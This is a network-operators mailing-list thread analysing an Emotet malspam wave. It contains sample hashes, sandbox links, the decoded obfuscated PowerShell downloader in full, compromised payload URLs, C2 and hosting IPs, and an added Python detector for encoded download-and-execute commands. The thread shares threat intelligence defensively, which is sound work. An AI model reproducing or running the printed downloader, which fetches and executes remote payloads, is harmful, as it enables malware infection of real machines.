29 May 2019: Emotet malspam: 'Mykolab Ref Id: I32560' [Was: Re: Spamming of NANOG list members]
*Just an FYI, the obfuscated URLs and IPs below are malicious.*

This is apparently (?) part of a wave of spoofed malspams impersonating messages with 'weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list.

Background: https://mailman.nanog.org/pipermail/nanog/2019-May/101140.html

Details:

Date: Wed, 29 May 2019 10:03:04 -0500
From: "NANOG" <Helene.Rouleau@paral.ca>
To: "Paul Ferguson" <fergdawgster@mykolab.com>
Subject: Mykolab Ref Id: I32560
X-Authenticated-Sender: s214.panelboxmanager.com
Return-Path: <Helene.Rouleau@paral.ca>

Attachment: "ATTACHMENT 654860 I32560.doc"
MD5: 49fbc31d5e46d83c4741d64a1c268e8d
SHA-1: 62b00133e2a78063b76a473a9c0b42a00b3042b8
SHA256: 8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5
File Type: MS Word Document
Magic: CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 28 12:55:00 2019, Last Saved Time/Date: Tue May 28 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
SSDeep: 3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z
TRiD: Microsoft Word document (54.2%), Microsoft Word document (old ver.) (32.2%), Generic OLE2 / Multistream Compound File (13.5%)
File Size: 136.38 KB

Analysis:
VT: https://www.virustotal.com/#/file/8c401ced381ce742105acae9b3d39d2f01681d4e3c...
HA: https://www.hybrid-analysis.com/sample/8c401ced381ce742105acae9b3d39d2f01681...
Joe Sandbox: https://www.joesandbox.com/analysis/136644/0/executive
app.any.run: https://app.any.run/tasks/18d747ef-42d6-40e8-b496-6eb54c5f5dac

Embedded PowerShell script does:

WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256)
powershell.exe powershell -nop -e [base64-encoded command omitted; decoded below] (PID: 2624)
Additional Context (decoded command):
$ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ'
936.exe (PID: 2888) 24/72
936.exe --26d066e0 (PID: 2932) 24/72
enablerouting.exe (PID: 272)

'Payload quintet' from script above (compromised pages):
http://ceo.calcus[.]com/postnewo/RwhvOlZIs/
http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/
http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/
http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/

Observed network activity:
GET ceo.calcus[.]com/postnewo/RwhvOlZIs/
GET lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
POST 31.12.67[.]62:7080/acquire/tlb/ringin/

Non-authoritative answer:
Name:    ceo.calcus[.]com
Address: 68.183.65[.]234

Non-authoritative answer:
Name:    lastminutelollipop[.]com
Address: 158.69.127[.]22

Non-authoritative answer:
Name:    kashmirhackers[.]com
Address: 173.249.2[.]31

Non-authoritative answer:
Name:    omegaconsultoriacontabil[.]com.br
Address: 74.63.242[.]18

Non-authoritative answer:
Name:    nottspcrepair[.]co.uk
Address: 185.38.44[.]163

AS    | IP              | AS Name
14061 | 68.183.65[.]234 | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting)
16276 | 158.69.127[.]22 | OVH, FR (shared hosting)
51167 | 173.249.2[.]31  | CONTABO, DE (shared hosting)
46475 | 74.63.242[.]18  | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting)
33182 | 185.38.44[.]163 | DIMENOC - HostDime.com, Inc., US (shared hosting)
44099 | 31.12.67[.]62   | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record)

FYI,

- ferg

--
Paul Ferguson
Principal, Threat Intelligence
Gigamon
Seattle, Washington, USA
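A defender-side detector for the encoded-PowerShell pattern in the post above, added here as an example (it is not from Paul's post or from any of the linked sandboxes): it decodes the base64/UTF-16LE behind `-e`, strips the backtick and ('a'+'b') obfuscation, flags the WebClient download, %USERPROFILE%\<n>.exe drop and Process::Start behaviour, and lists the embedded URLs. The sample command line is constructed with placeholder `.invalid` hosts rather than the real payload URLs.

```python
import base64
import re

# Constructed sample shaped like the decoded downloader above; .invalid placeholder hosts
SAMPLE_SCRIPT = (
    "$p=$env:userprofile+'\\'+'936'+'.exe';"
    "$c=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;"
    "$u='http://host-a.invalid/a/@http://host-b.invalid/b/'.SPLiT('@');"
    "foreach($x in $u){try{$c.DowNLOadFILE($x,$p);"
    "If ((&('Get-'+'Ite'+'m') $p).lEngTH -ge 29780)"
    "{[Diagnostics.Process]::START($p);break}}catch{}}"
)
SAMPLE_CMDLINE = "powershell -nop -e " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# -e / -enc / -EncodedCommand carries base64 of a UTF-16LE string
ENC_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
CONCAT = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)")  # ('a'+'b')
URL = re.compile(r"https?://[^\s'\"@]+")
INDICATORS = {
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadfile": re.compile(r"\.downloadfile\(", re.I),
    "process_start": re.compile(r"\[diagnostics\.process\]::start", re.I),
    "userprofile_exe": re.compile(r"\$env:userprofile.*\.exe", re.I),
}

def decode_encoded_command(cmdline):
    """Return the script behind an encoded-command flag, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def deobfuscate(script):
    """Drop backtick breaks (WeBC`L`IENt) and fold ('a'+'b') into 'ab'."""
    script = script.replace("`", "")
    fold = lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'"
    return CONCAT.sub(fold, script)

def analyze(cmdline):
    """Flag indicator hits and extract URLs from one process command line."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "hits": [], "urls": []}
    clean = deobfuscate(script)
    hits = [name for name, rx in INDICATORS.items() if rx.search(clean)]
    return {"encoded": True, "hits": hits, "urls": URL.findall(clean)}
```

Feed it process-creation command lines (Sysmon Event ID 4688/1 style) and treat any hit on `downloadfile` plus `process_start` as a download-and-execute alert; the extracted URLs go straight to blocklisting.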
* fergdawgster@mykolab.com (Paul Ferguson) [Wed 29 May 2019, 18:04 CEST]:
> This is apparently (?) part of a wave of spoofed malspams impersonating messages with 'weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list.

They're not sent to the list, they're sent directly to people who have previously posted to the list. NANOG have no way to stop these.

-- Niels.
On May 29, 2019, at 9:14 AM, Niels Bakker <niels=nanog@bakker.net> wrote:
> * fergdawgster@mykolab.com (Paul Ferguson) [Wed 29 May 2019, 18:04 CEST]:
>> This is apparently (?) part of a wave of spoofed malspams impersonating messages with 'weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list.
>
> They're not sent to the list, they're sent directly to people who have previously posted to the list. NANOG have no way to stop these.
>
> -- Niels.

Understood, but I figured folks might like to know what they might be dealing with.

Cheers,

- ferg

--
Paul Ferguson
Principal, Threat Intelligence
Gigamon
Seattle, Washington, USA
On Wed, 29 May 2019, Paul Ferguson wrote:
> AS    | IP              | AS Name
> 14061 | 68.183.65[.]234 | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting)
> 16276 | 158.69.127[.]22 | OVH, FR (shared hosting)
> 51167 | 173.249.2[.]31  | CONTABO, DE (shared hosting)
> 46475 | 74.63.242[.]18  | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting)
> 33182 | 185.38.44[.]163 | DIMENOC - HostDime.com, Inc., US (shared hosting)
> 44099 | 31.12.67[.]62   | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record)

few surprises here. known complacent/spam-friendly providers.

-Dan